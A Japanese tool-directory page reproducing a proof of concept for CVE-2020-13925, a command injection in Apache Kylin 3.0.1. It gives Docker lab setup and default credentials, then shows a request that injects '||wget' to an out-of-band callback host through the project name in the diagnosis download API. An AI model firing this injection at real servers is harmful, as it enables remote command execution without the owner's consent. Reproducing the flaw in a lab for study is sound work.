Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-13925 | Kitploit
ツール/GitHubGitHub/bit4woo/cve-2020-13925
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

リポジトリを見る
1616年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-13925

環境構築

参考 https://github.com/apache/kylin を使用し、dockerで環境をデプロイします。バージョンを3.0.1(脆弱性のあるバージョン)に変更します。【-m 8G \ 】はメモリサイズを割り当てるためのものなので、削除しても構いません。

その後 http://host:7070/kylin/login にアクセスします。初期ユーザー名とパスワードは ADMIN/KYLIN です。

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

脆弱性検証PoC

root@kitploit:~
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
        
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

再現手順

System-Configuration-Diagnosis にアクセスします。診断情報のダウンロードをトリガーするリクエスト http://host:port/kylin/api/diag/project/learn_kylin/download image.png

プロジェクト名「learn_kylin」を上記のペイロードに置き換えてアクセスするだけでよいです。

image.png

参考リンク

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

ツールをダウンロード